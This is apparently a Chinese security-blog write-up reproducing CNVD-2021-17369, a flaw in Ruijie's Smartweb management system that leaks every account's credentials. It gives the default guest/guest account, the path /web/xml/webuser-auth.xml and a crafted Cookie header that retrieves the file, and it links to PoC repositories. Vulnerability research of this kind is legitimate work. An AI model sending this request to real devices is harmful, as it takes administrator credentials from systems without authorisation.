点击蓝字
关注我们
声明
本文作者:PeiQi
本文字数:700
阅读时长:10min
附件/链接:点击查看原文下载
本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。
狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
前言
漏洞描述
漏洞影响
漏洞复现
然后找到了一个设备存在管理admin员的弱口令,进去后发现Web CLI控制台
翻文件的过程中发现一个文件很有意思,运行命令查看
more /web/xml/webuser-auth.xml
里面存在所有人的账号密码,于是测试直接访问
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
发现被拦截了,不能访问,想到刚刚CNVD的描述是低权限获取高权限账号
于是继续爆破账号密码,找一个低权限账号,然后正在愁密码的时候,看见另一条 CNVD
拿几个弱口令爆破一下,发下多个设备默认存在 guest账户,账号密码为 guest/guest
但是没有CIL控制台可以使用了,在重新测试访问刚刚的漏洞点
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
Cookie添加
Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
Goby & POC
Goby & POC 已经同步到 Github仓库中的 Goby & POC 目录
https://github.com/PeiQi0/PeiQi-WIKI-POC
https://github.com/wgpsec/wiki
其中包含CNVD-2020-56167 和 CNVD-2021-17369
作者
扫描关注公众号回复加群
和师傅们一起讨论研究~
长
按
关
注
WgpSec狼组安全团队
微信号:wgpsec
Twitter:@wgpsec
本文始发于微信公众号(WgpSec狼组安全团队):锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论